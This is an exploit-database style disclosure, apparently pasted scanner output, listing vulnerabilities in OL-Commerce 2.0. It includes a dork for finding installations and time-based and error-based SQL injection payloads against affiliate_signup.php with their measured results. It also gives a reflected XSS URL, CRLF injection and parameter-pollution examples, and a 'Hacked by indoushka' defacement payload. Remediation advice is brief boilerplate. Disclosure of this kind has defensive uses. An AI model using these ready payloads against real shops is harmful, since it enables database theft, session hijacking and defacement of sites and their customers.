facebook facebook twitter rss

OL-Commerce Version 2.0 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
OL-Commerce Version 2.0 Multi Vulnerability
===========================================
Author : indoushka
Vondor : http://www.ol-commerce.com
Dork: Copyright (c) 2007 OL-Commerce
==================================================

Blind SQL Injection :

This vulnerability affects /olcommerce/affiliate_signup.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input a_country was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

Tests performed:
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ => 19.937 s
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ => 7.113 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 13.291 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 1.217 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.905 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.983 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.796 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 13.119 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.765 s

Original value: 1

CRLF injection/HTTP response splitting :

HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
Affected items
/olcommerce/advanced_search.php
/olcommerce/advanced_search_result.php
/olcommerce/affiliate_password_forgotten.php
/olcommerce/index.php
/olcommerce/shop_content.php
The impact of this vulnerability
Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies or HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation.

How to fix this vulnerability
You need to restrict CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers.

http://127.0.0.1/olcommerce/advanced_search_result.php?keywords=%3Cmarquee%3E%3Cfont+color%3DBlue+size&x=14&y=13

Cross site scripting (verified) :

http://127.0.0.1/olcommerce/advanced_search_result.php?categories_id=1%22%20onmouseover%3dprompt%28923816%29%20bad%3d%22&inc_subcat=1&keywords=1&manufacturers_id=1&pfrom=1&pto=1&search_in_description=1

Affected items
/olcommerce/advanced_search_result.php
/olcommerce/affiliate_signup.php
The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

How to fix this vulnerability
Your script should filter metacharacters from user input.

HTTP parameter pollution :

HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If the web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either clientside or server-side attacks.
This vulnerability affects /olcommerce/advanced_search.php.
Discovered by: Scripting (HTTP_Parameter_Pollution.script).
Attack details
URL encoded POST input quickie was set to 1&n959801=v983563
Parameter precedence: first occurrence
Affected link: http://127.0.0.1/olcommerce/advanced_search_result.php?keywords=1&n959801=v983563&language=en
Affected parameter: keywords=1

The impact of this vulnerability
The impact depends on the affected web application. An attacker could

Override existing hardcoded HTTP parameters
Modify the application behaviors
Access and, potentially exploit, uncontrollable variables
Bypass input validation checkpoints and WAFs rules

How to fix this vulnerability
The application should properly sanitize user input (URL encode) to protect against this vulnerability

http://127.0.0.1/olcommerce/advanced_search_result.php?keywords=1&n959801=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E

SQL injection (verified) :

This vulnerability affects /olcommerce/affiliate_signup.php.
Discovered by: Scripting (Sql_Injection.script).
Attack details
URL encoded POST input a_country was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(66),CHAR(113),CHAR(65),CHAR(74),CHAR(73),CHAR(84),CHAR(109),CHAR(51)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
Injected pattern found:
4CuBqAJITm3

The impact of this vulnerability
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

How to fix this vulnerability
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.









Like us on Facebook :